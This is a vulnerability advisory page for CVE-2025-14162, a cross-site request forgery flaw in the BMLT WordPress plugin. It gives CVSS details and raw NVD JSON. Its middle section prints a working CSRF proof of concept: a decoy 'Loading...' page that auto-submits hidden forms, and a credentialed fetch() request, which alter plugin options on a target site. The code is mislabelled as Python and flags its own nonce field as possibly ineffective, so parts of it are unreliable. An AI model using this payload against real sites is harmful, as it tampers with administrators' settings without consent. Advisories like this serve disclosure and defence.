Security Vulnerability Report
中文
CVE-2025-14162 CVSS 4.3 MEDIUM

CVE-2025-14162

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The BMLT WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.11.4. This is due to missing nonce validation on the 'BMLTPlugin_create_option' and 'BMLTPlugin_delete_option ' action. This makes it possible for unauthenticated attackers to create new plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BMLT WordPress Plugin <= 3.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14162: BMLT Plugin Settings Creation --> <!-- Save this as poc.html and trick admin to open it --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait, loading...</h1> <!-- Auto-submit form to create malicious option --> <form id="csrf_form" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="BMLTPlugin_create_option"> <input type="hidden" name="options_name" value="bmlt_malicious_setting"> <input type="hidden" name="options_value" value="malicious_value"> <!-- Add nonce bypass attempt (may not work if nonce is required) --> <input type="hidden" name="_wpnonce" value="attacker_controlled_or_blank"> </form> <!-- Auto-submit form to delete existing option --> <form id="csrf_form_delete" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="BMLTPlugin_delete_option"> <input type="hidden" name="options_name" value="bmlt_existing_setting"> <input type="hidden" name="_wpnonce" value="attacker_controlled_or_blank"> </form> <script> // Auto-submit the forms when page loads window.onload = function() { // Submit create option form document.getElementById('csrf_form').submit(); // Optionally submit delete form // document.getElementById('csrf_form_delete').submit(); }; </script> </body> </html> <!-- Alternative: JavaScript-based fetch PoC --> <script> fetch('http://target-site.com/wp-admin/admin-post.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=BMLTPlugin_create_option&options_name=malicious_option&options_value=pwned' }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14162", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:48.930", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BMLT WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.11.4. This is due to missing nonce validation on the 'BMLTPlugin_create_option' and 'BMLTPlugin_delete_option ' action. This makes it possible for unauthenticated attackers to create new plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/tags/3.11.4/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/trunk/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0344f49b-f5f9-4729-ade0-cba6289406de?source=cve", "source": "[email protected]"}]}}